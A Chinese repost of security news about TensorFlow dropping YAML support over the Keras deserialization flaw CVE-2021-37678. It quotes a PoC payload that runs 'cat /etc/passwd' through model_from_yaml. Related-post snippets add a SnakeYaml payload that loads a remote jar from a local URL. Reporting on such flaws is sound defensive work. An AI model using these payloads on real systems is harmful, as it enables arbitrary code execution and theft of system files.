YAML出现严重的反序列化漏洞,谷歌TensorFlow将采用 JSON

最新推荐文章于 2024-07-01 10:03:48 发布
最新推荐文章于 2024-07-01 10:03:48 发布
阅读量1.2k 收藏
点赞数
文章标签: ai 数学建模 epoll qml less
原文链接:https://item.jd.com/12927539.html
版权

 聚焦源代码安全,网罗国内外最新资讯!

编译:代码卫士

由谷歌开发的基于 Python 的开源机器学习和人工智能项目 TensorFlow 放弃对 YAML 的支持,以修复严重的代码执行漏洞。

YAML (Yet Another Markup Language) 是开发人员使用的人类可读数据序列化语言,用于处理配置文件和传输中的数据。

TensorFlow 中不受信任的反序列化漏洞

TensorFlow 和 TensorFlow 的封装项目 Keras 的维护人员修复了因 YAML 解析不安全而引发的不可信序列化漏洞。该漏洞的编号为 CVE-2021-37678,为严重漏洞,可使攻击者在应用程序反序列化 YAML 格式下的 Keras 模型时执行任意代码。

一般而言,当应用程序从未认证来源读取畸形或恶意数据时就会触发反序列化漏洞。应用程序读取并反序列化数据后,它可能崩溃,从而导致拒绝服务条件或在更糟糕的情况下执行攻击者的任意代码。

该 YAML 反序列化漏洞的评分为9.3,由安全研究员 Arjun Shibu 报告给 TensorFlow 的维护人员。

而该漏洞的源头在于 TensorFlow 代码中的 “yaml.unsafe_load()” 函数。

该函数很随意地反序列化 YAML 数据,它会解析所有的标记,甚至会解析已知的不安全的不受信任输入。也就是说,在理想情况下 “unsafe_load” 应当仅被来自不可信来源的输入调用,而且应当不含任何恶意内容。否则,攻击者可利用该反序列化机制,通过在尚未被序列化的 YAML 数据中注入恶意 payload 的方式执行所选代码。

安全公告分享了此类 PoC exploit:

from tensorflow.keras import models


payload = '''
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
'''
  
models.model_from_yaml(payload)

TensorFlow 完全摈弃 YAML,使用 JSON

收到该漏洞报告后,TensorFlow 决定完全摒弃 YAML 支持,而是使用 JSON 反序列化。项目维护人员在安全公告中指出,“鉴于 YAML 格式支持要求大量工作,因此我们暂时将其删除。我们已取代  `Model.to_yaml()` 和 `keras.models.model_from_yaml` 方法,触发 “RuntimeError”,因为它们可被滥用于引发任意代码执行。建议使用JSON 反序列化,或者更好的选择是序列化至 H5。“

值得注意的是,TensorFlow 并非第一个也非唯一一个使用 YAML unsafe_load 函数的项目。该函数在 Python 项目中的使用非常普遍。

GitHub 搜索结果显示有数千个项目使用该函数,其中有些开发人员提议进行改进。

该漏洞的修复方案将在 TensorFlow 版本2.6.0中现身,同时将被反向兼容至之前版本 2.5.1、2.4.3以及2.3.4。

开奖啦!!!!!】

限时赠书|《软件供应链安全—源代码缺陷实例剖析》新书上市

上次的限时赠书活动中奖名单已出炉,恭喜以下同学中奖,请微信后台私信地址,本周我们将陆续发送书籍。

@whyseu @。@HFwuhome@惊蛰 @nimo @XuZ @淡然 @Marco韬 @王孟 @Wecat@nwnλ @MOBE @湘北二两西香葱@※ @搬砖小土妞@云烟过眼 @r00t@小风 @傲雪@最好走的路是套路 @Zhao.xiaojun @浅笑淡然 @X-Star @Erick2013 @小秦同学 @X @王骏 @欢寻 @nbp@Mr. Guo

大家可移步京东电子工业出版社一睹为快!

https://item.jd.com/12927539.html 或直接点击“原文链接”购买。

如下是本书相关讲解:

推荐阅读

一步一步回顾分析攻防演习中的 WebLogic T3 反序列化 0day 漏洞

APACHE OFBIZ XML-RPC 反序列化漏洞 (CVE-2020-9496) 的复现与分析

XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析

Apache Commons Collections反序列化漏洞分析与复现

原文链接

https://www.bleepingcomputer.com/news/security/googles-tensorflow-drops-yaml-support-due-to-code-execution-flaw/

题图:Pixabay License

本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的产品线。

    觉得不错,就点个 “在看” 或 "赞” 吧~

奇安信代码卫士
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
yaml反序化漏洞本地环境复现
11-23
yaml反序化漏洞本地环境复现 CTF 比赛中yaml反序劣化payloads有个!!的限制,当时没搞出来,事后大神透露需要借助tag, 于是就有了这个资源文件
YAML漏洞被弃用?网友:YAML 不背锅!
Java技术栈,分享最主流的Java技术
09-10 226
点击关注公众号,Java干货及时送达文 | Travis出品 | OSC开源社区(ID:oschina2013)Tensorflow 是一个基于 Python 的机器学习和人工智能项目,该...
nacos漏洞小结
最新发布
qq_61475980的博客
07-01 1797
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。在路径后面加上可以获取到已有的用户名和密码,可以把User-Agent头改为Nacos-Server,如图更改提交方式为POST, 访问新建一个账号test111,可以看到创建用户成功,如图更改提交方式为DELETE, 访问可以看到用户删除成功,如图更改提交方式为。
Pyyaml-yaml.load反序列化漏洞
huichen1233的博客
08-30 2956
YAML 是 “YAML Ain’t a Markup Language”(YAML 不是一种标记语言)的递归缩写。在开发的这种语言时,YAML 的意思其实是:“Yet Another Markup Language”(仍是一种标记语言)。YAML 的语法和其他高级语言类似,并且可以简单表达清单、散列表,标量等数据形态。它使用空白符号缩进和大量依赖外观的特色,特别适合用来表达或编辑数据结构、各种配置文件、倾印调试内容、文件大纲(例如:许多电子邮件标题格式和YAML非常接近)。blog.yml。...
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) FastjsonJSON) Genson(JSON) ...
yaml2json:将yaml转换为json
02-03
本篇文章将详细探讨“yaml2json”工具,它能帮助我们将YAML格式的数据转换成JSON格式,以及如何使用Nim语言实现这个转换过程。 **YAMLJSON** 1. **YAML**:YAML是一种简洁且易于阅读的标记语言,常用于配置文件...
yaml2json:将YAML转换为JSON的实用程序
03-29
yaml2json 该项目提供了一个简单的库和CLI,用于将YAML转换为JSON,分别用Python和Go编写。用法构建Go实用程序: $ go get -u github.com/mbrukman/yaml2json/cmd/{yaml2json,json2yaml} 转换YAMLJSON: # read ...
Nacos漏洞综合利用GUI工具(完整源码+说明)(身份认证绕过漏洞反序列化漏洞的检测及其利用).zip
03-27
【资源说明】 1、该资源内项目代码都是经过测试运行成功,功能正常的情况下才上传...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞反序列化漏洞的检测及其利用).zip
Java安全之SnakeYaml漏洞分析与利用
2201_75362610的博客
02-01 1129
SnakeYaml是Java中解析yaml的库,而yaml是一种人类可读的数据序列化语言,通常用于编写配置文件等。yaml基本语法大小写敏感使用缩进表示层级关系缩进只允许使用空格表示注释支持对象、数组、纯量这3种数据结构示例key:companies:id: 1id: 2意思是 companies 属性是一个数组,每一个数组元素又是由 id、name、price 三个属性构成YAML 入门教程 | 菜鸟教程SnakeYaml库。
在运行时对用户控制的对象流进行反序列化,会让攻击者有机会在服务器上执行任意代码、滥用应用程序逻辑和/或导致 Denial of Service。
g56467467464的博客
07-03 1530
Abstract: 在运行时对用户控制的对象流进行反序列化,会让攻击者有机会在服务器上执行任意代码、滥用应用程序逻辑和/或导致 Denial of Service。 Explanation: Java 序列化会将对象图转换为字节流(包含对象本身和必要的元数据),以便通过字节流进行重构。开发人员可以创建自定义代码,以协助 Java 对象反序列化过程,在此期间,他们甚至可以使用其他对象或代理替代反序列化对象。在对象重构过程中,并在对象返回至应用程序并转换为预期的类型之前,会执行自定义反序列化过程。到开发人员尝.
PyYaml反序列化漏洞详解
2302_76827504的博客
04-27 603
果listitems不为空,则调用instance的extend()方法,将listitems中的所有元素添加到instance列表对象的末尾,instance是我们创建的实例,这里并没有定义listitems是什么,如果我们的listitems是一个字典,而且其内容有"{‘extend’:function}",这样的话,我们就可以利用extend进行任意函数的执行了。在这个方法中,data是一个包含YAML格式字符串的变量,可以是从文件中读取的字符串,也可以是用户输入的字符串等。ddd的值为666。
OpenShift 4 - 用KubeLinter检查YAML的配置风险
多恩斯基的博客
05-07 564
文章目录认识 KubeLinter使用 KubeLinter参考 认识 KubeLinter KubeLinter 是一个开源项目,它源自红帽收购的容器安全公司 StackRox。KubeLinter 是一个静态检查工具,可用来检查识别 Kubernetes 对象 YAML 或 Helm Chart 中的错误配置,比如以非root用户身份运行容器、只在 Secret中存储敏感信息。既可以单独使用 KubeLinter 命令检查错误配置,也可以在 CI/CD 中使用 KubeLinter。当 KubeLint
为修复一个代码执行安全漏洞TensorFlow决定不再支持YAML
HBohan的博客
09-13 250
TensorFlow谷歌开发的基于Python的机器学习和人工智能项目。为修复一个代码执行安全漏洞TensorFlow决定不再支持YAMLYAML(Yet Another Markup Language)是一个可读性高,用来表达数据序列化的格式。YAML参考了其他多种语言,包括C语言、Python、Perl,并从XML、电子邮件的数据格式。 CVE-2021-37678:TensorFlow不可信反序列化漏洞 安全研究人员Arjun Shibu在TensorFlow和Keras中发现了一个安全漏洞——
Java axis 配置host_Apache Axis1 与 Axis2 WebService 的漏洞利用总结
weixin_30636329的博客
02-27 1324
作者:Longofo@知道创宇404实验室日期:2021年2月26日Apache Axis分为Axis1(一开始就是Axis,这里为了好区分叫Axis1)和Axis2,Axis1是比较老的版本了,在Axis1官方文档说到,Apache Axis1现在已经很大程度被Apache Axis2,Apache CXF和Metro取代,但是,Axis1仍与以下类型的项目相关:需要使用JAX-RPC的项目。该...
yaml反序列化
u013224189的专栏
11-23 2188
Yaml反序列化 payloads1: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:7800/yaml-payload.jar"] ]] ] payloads2: ​ 绕过 !! 的限制,如下: !可以用 tag:yaml.org,2002 表示。 !<tag:yaml.org,2002:javax.script.Scri
TensorFlow 删除 YAML 支持,建议 JSON 作为替补方案!
热门推荐
一起来捉 Bug 呀~~
09-07 1万+
TensorFlow,作为一个主流的开源 Python 库,最初由 Google 开发用于机器学习领域,逐渐成为 GitHub 顶级开源 TOP 10 项目之一。 近日,Google TensorFlow 项目团队宣布了一项重大的改变,由于存在一个关键代码执行漏洞,其取消对另一种标记语言 YAML 的支持。TensorFlow 团队表示,鉴于 YAML 支持需要大量工作,因此暂时删除了 YAMLYAML 是一种可读性高,用来表达资料序列化的格式。开发者常用 YAML 作为通用格式来存储数据并在进程和应用
加载不可信的YAML格式的文件或字符串时,调用默认的yaml.load不安全
weixin_42299862的博客
03-28 1122
一、 什么是yaml格式文件的解析? yaml是一种类似xml和json的用于格式化数据的标记语言,解析即将yaml文件加载为一个Map对象。 举个例子,这是一个yaml文件 python: 3.5.3 postgres: 9.3 解析后该文件加载为一个Map对象: {‘python’: ‘3.5.3’, ‘postgres’: 9.3} 二、系列化和反序列化 序列化是将对象转换成字节流的过程,而...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值